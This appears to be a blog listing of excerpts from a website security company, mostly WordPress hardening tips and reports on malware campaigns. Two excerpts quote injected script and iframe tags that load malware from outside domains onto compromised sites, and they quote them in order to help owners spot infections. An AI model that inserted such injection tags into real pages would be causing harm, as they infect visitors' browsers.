We often write posts that give you advice and recommendations around how to harden your websites, and have only recently begun to give advice on ways to navigate your backend and remove infections via terminal. But what about all the basics? That’s what I want to cover in this post. All those things that you should know [...]
How To: Lock Your Site by Enabling a Second Layer of Authentication
June 25, 2012 by
I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication. That got me thinking about a putting together this post which will [...]
How To: Stop The Hacker By Hardening WordPress
June 19, 2012 by
Every day we service 100′s of clients and the question is always asked: How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
How To: Remove McAfee SiteAdvisor Blacklisting
June 14, 2012 by
As more and more blacklisting authorities come online it becomes important to understand how to go about submitting your site for a review. The most recent challenge has been figuring out how to go about getting a site off the McAfee SiteAdvisor solution. You can read more about what SiteAdvisor is here: http://www.siteadvisor.com/howitworks/index.html What’s really [...]
Partnerships: Sucuri & ClickHOST.com
June 12, 2012 by
Since April 2012, ClickHOST.com and Sucuri have been enjoying a symbiotic relationship. The two partnered in an attempt to offer cost-effective services to their clients. The family team at ClickHOST.com has recognized the need to get ahead of the web malware problem and understands that its not ok to simply shut down a site or [...]
How To: Enhance User Security with Dreamhost
May 24, 2012 by
If you are using DreamHost, we recommend a few options to increase the security of your sites in their environment: Enhanced User Security It adds a few security restrictions per site/accounts to minimize the chances of attacks from other users in the same shared server. Configure a different user account per site There is also [...]
New Malware – sweepstakesandcontestsnow.com
September 19, 2011 by
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what is gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
September 13, 2011 by
We are often asked what were the top domains distributing malware or what threats we see more often on our security scanner. For the month of August, things were very similar to the previous ones, with a slightly increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
After the clean up. What to do after your site is fixed.
May 31, 2011 by
If you are reading this page then you are on your way to being proactive and actively taking steps to help reduce the risk of reinfection. While no-one can promise you the risk will ever be zero, we can work together to ensure that its as low as possible. Will this guarantee I won’t get [...]
Malware iframes from .co.be, .biz.ua and chadon.nl
May 24, 2011 by
We are seeing many sites infected with malware getting loaded from the “.co.be” and “.ua” domains. This is what shows up in a hacked site: <iframe width=”1px" height="1px" src="http://ewloidydytgba.co.be/forum.php?tp=c1f00d62cc7.. <script type= ”text/javascript´’ src="http://promelit.biz.ua/facebook.php".. Or a similar code. Many of them have the filename “facebook.php” or “forum.php” to try to look like a legitimate link. Some other domains [...]
